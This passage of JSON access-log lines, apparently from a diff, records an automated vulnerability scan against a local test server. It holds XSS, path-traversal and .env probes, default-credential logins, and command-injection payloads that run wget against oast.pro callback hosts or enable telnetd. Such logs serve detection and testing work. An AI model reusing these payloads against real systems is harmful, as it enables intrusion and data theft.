+{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /seo/seopanel/login.php?sec=forgot HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/config/1.0/directory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/vars HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search.php?search=%22;wget+http%3A%2F%2Fca28bc0smpvbbtig07h0ausjbcrbxt4yc.oast.pro%27;%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"{\x22user\x22:\x22access-admin\x22,\x22password\x22:\x22password\x22,\x22type\x22:\x22login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1/artifactory/webapp/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/pprof/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/read_body.php?mailbox=/etc/passwd&passed_id=1& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /deploy.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.998","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.settings/rules.json?auth=FIREBASE_SECRET HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?post_type=post&s=%22%3E%3Cscript%3Ealert(/29KBxfkhfsFpdNQ8o8vohb0c4bt/)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/pprof/goroutine?debug=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"success=%2Fshare%2Fpage%2F&failure=:\x5C\x5Cexample.com&username=baduser&password=badpass\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /share/page/dologin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bugs/verify.php?confirm_hash=&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aws.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"target_addr=\x221.1.1.1+`wget+http%3A%2F%2Fca28bc0smpvbbtig07h08z1j3z9inwm9d.oast.pro%2F`\x22&waninf=127.0.0.1\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boaform/admin/formTracert HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/diag_ping_admin_en.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/host-manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /css_parser.php?css=css_parser.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uir//etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zabbix/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/client/welcome/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///var HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRESENTATION/HTML/TOP/PRTINFO.HTML HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\x22R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\x22))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /images/..%2fapply_abstract.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", 